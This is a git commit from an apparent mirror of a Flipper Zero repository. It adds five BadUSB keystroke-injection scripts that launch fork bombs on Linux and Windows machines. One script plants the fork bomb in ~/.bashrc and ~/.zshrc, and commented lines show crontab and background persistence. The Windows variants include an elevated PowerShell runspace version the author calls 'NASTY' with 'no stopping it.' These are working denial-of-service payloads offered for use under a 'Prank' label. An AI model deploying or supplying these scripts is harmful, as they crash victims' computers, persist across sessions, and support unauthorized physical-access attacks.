mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 20:11:30 +00:00
added updated t119 brute/badusb bombs
This commit is contained in:
@@ -0,0 +1,22 @@
|
||||
REM Title: Terminal forkbomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Unix-like tested on kubuntu 22.04.
|
||||
REM Props: Hak5, 7h30th3r0n3 for the initial submission of a simpler version of drapl0n's terminalbomb script, UberGuidoZ for keeping the flipper repo going.
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches terminal and spawns a terminal forkbomb
|
||||
REM
|
||||
DELAY 300
|
||||
REM Minimize all windows as that ensures launch happens smoother.
|
||||
WINDOWS d
|
||||
DELAY 300
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
STRING :(){ :|:& };:
|
||||
ENTER
|
||||
REM If you want to do it in the background so you can close the terminal with adding ALT F4
|
||||
REM STRING nohup :(){ :|:& };: >> /dev/null &
|
||||
REM if you want to do it every time they open a terminal like drapl0n's terminalbomb style
|
||||
REM STRING echo ":(){ :|:& };:" >> ~/.bashrc
|
||||
REM if you want to make it happen every hour
|
||||
REM STRING crontab -l | sed "\$a\@hourly sh :(){ :|:& };:" | crontab -
|
||||
@@ -0,0 +1,21 @@
|
||||
REM Title: terminal bomb
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: Unix-like tested on kubuntu 22.04
|
||||
REM Props: Hak5, drapl0n for the OG termbomb, the community and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Recon
|
||||
REM Starts a forkbomb every time they open a terminal, if you want a more elequently written one check out drapl0n's PL as this is just a basic one liner. Simple but effective with less points of failure.
|
||||
REM Lamp oil, rope? Bombs! You want it? It's yours my friend! As long as you have enough Rupees!
|
||||
REM
|
||||
REM initialization delay
|
||||
DELAY 300
|
||||
REM Minimize all windows as that ensures launch happens smoother.
|
||||
WINDOWS d
|
||||
DELAY 300
|
||||
CTRL-ALT t
|
||||
DELAY 1500
|
||||
STRING echo ":(){ :|:& };:" >> ~/.zshrc && echo ":(){ :|:& };:" >> ~/.bashrc
|
||||
DELAY 300
|
||||
ENTER
|
||||
DELAY 500
|
||||
ALT F4
|
||||
@@ -0,0 +1,16 @@
|
||||
REM Title: CMD forkbomb
|
||||
REM Author: 7h30th3r0n3
|
||||
REM Target: Tested on Windows 7/8/10/11
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches CMD and spawns a CMD forkbomb which create a waterfall of cmd and crash the pc
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING (echo :b && echo start b.bat && echo goto b)>b.bat
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING b.bat
|
||||
ENTER
|
||||
@@ -0,0 +1,18 @@
|
||||
REM Title: Win forkbomb variant 2
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target: XP-11
|
||||
REM Props: Hak5, da3m0n s3c for the one liner, UberGuidoZ for keeping the flipper repo going.
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches terminal and spawns a terminal forkbomb, if you want forkers in multiple languages head here https://da3m0ns3c.blogspot.com/2017/04/fork-bomb-in-several-language-implements.html
|
||||
REM
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING cmd.exe
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING echo %0^|%0 > forkbomb.bat && forkbomb.bat
|
||||
DELAY 200
|
||||
ENTER
|
||||
@@ -0,0 +1,20 @@
|
||||
REM Title: Win forkbomb, thread shitter or ryzen temps
|
||||
REM Author: FalsePhilosopher
|
||||
REM Target:10-11
|
||||
REM Props: Hak5, da3m0n s3c for the one liner https://da3m0ns3c.blogspot.com/2017/04/fork-bomb-in-several-language-implements.html, the community and memes
|
||||
REM Version: 1.0
|
||||
REM Category: Prank
|
||||
REM Launches terminal and spawns a forkbomb on every thread the system reports that then spawns shells that spawn forkbombs. It spawned about 850 processes in 15 seconds, there is no stopping it so be careful testing this thing is NASTY! It takes 5-10 sec to spin up the run pools so it's not immediate.
|
||||
REM
|
||||
DELAY 300
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING cmd.exe
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
SHIFT TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 1500
|
||||
STRING echo %0^|%0 > fb.bat&&powershell -w h $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(C:\Windows\System32\fb.bat);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke()
|
||||
ENTER
|
||||
Reference in New Issue
Block a user